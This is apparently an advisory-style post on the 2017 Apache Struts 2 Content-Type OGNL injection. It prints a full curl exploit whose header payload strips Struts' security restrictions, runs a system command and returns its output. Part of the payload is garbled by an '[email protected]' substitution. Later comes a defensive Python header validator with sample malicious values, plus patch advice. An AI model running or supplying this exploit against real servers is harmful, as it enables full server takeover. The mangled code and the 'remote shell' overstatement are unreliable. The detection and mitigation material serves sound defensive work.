How the mentioned CVE works:
The vulnerability exists in the Jakarta Multipart parser in Apache Struts 2. An attacker exploits it by sending a crafted `Content-Type` header in an HTTP request to a vulnerable Struts endpoint. Because the header value is not sanitized, the parser's error handling copies the raw value into an error message, and that message is then evaluated as an OGNL (Object-Graph Navigation Language) expression. This allows injection and execution of arbitrary OGNL code on the server. The attacker's OGNL code runs with the application's privileges, which leads to full system command execution. The root cause is the exception handler that passes the malformed header value directly into an error message where it is interpreted as an expression.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
```
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://vulnerable-server.com/struts2-endpoint
```
How the exploit works:
Craft a malicious Content-Type header.
Send the HTTP request to a Struts endpoint.
The server evaluates the header value as OGNL.
The attacker gains a remote shell.
Protection from this CVE:
Upgrade Struts immediately.
Apply the official patch.
Use input validation filters that reject Content-Type headers which are not well-formed media types.
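The last mitigation is the one a WAF or reverse proxy can apply while an upgrade is scheduled. The following is an added example, not code from Undercode or from the Struts project: it validates a `Content-Type` value against the simplified RFC 7231 media-type grammar and flags the OGNL expression delimiters (`%{`, `${`) that have no legitimate place in that header. The sample requests, their ids and the function names are constructed for illustration.

```python
import re
from typing import List, Tuple

# Simplified RFC 7231 media-type grammar:
#   media-type = type "/" subtype *( OWS ";" OWS parameter )
#   parameter  = token "=" ( token / quoted-string )
# tchar deliberately excludes "{", "}", "(", ")", "@" and "=", so an OGNL
# expression can never pass as a bare type/subtype or parameter name.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED_STRING = r'"(?:[^"\\]|\\.)*"'
PARAMETER = rf"{TOKEN}=(?:{TOKEN}|{QUOTED_STRING})"
MEDIA_TYPE = re.compile(rf"{TOKEN}/{TOKEN}(?:\s*;\s*{PARAMETER})*\s*")

# Delimiters that start an OGNL expression in Struts-evaluated text.
# Seeing either one inside a Content-Type header is never legitimate.
OGNL_MARKERS = ("%{", "${")


def classify_content_type(value: str) -> str:
    """Return 'ognl-suspect', 'malformed' or 'ok' for one Content-Type value.

    The marker check runs first so that an expression hidden inside an
    otherwise well-formed parameter value is still reported as suspect.
    """
    if any(marker in value for marker in OGNL_MARKERS):
        return "ognl-suspect"
    if not MEDIA_TYPE.fullmatch(value.strip()):
        return "malformed"
    return "ok"


def scan_requests(requests: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (request_id, verdict) for every request a filter should block."""
    blocked = []
    for request_id, content_type in requests:
        verdict = classify_content_type(content_type)
        if verdict != "ok":
            blocked.append((request_id, verdict))
    return blocked


# Constructed sample requests (not captured traffic): request id, Content-Type.
SAMPLE_REQUESTS = [
    ("req-1", "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"),
    ("req-2", "application/json"),
    ("req-3", 'text/html; charset="utf-8"'),
    ("req-4", "%{(#_='multipart/form-data').(#x=1)}"),
    ("req-5", "multipart/form-data; boundary=${1+1}"),
    ("req-6", "multipart/form-data; boundary=(not a token)"),
]

if __name__ == "__main__":
    for request_id, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{request_id}: {verdict}")
```

Grammar validation alone already rejects the payload shape shown above, because `{` and `(` are not token characters, so the marker check is a second, independent signal rather than the only one. A filter like this is a stopgap: the fixed Struts releases (2.3.32 and 2.5.10.1) remain the real remediation.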
Impact:
Full server compromise.
Arbitrary command execution.
Complete system access.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub: Undercode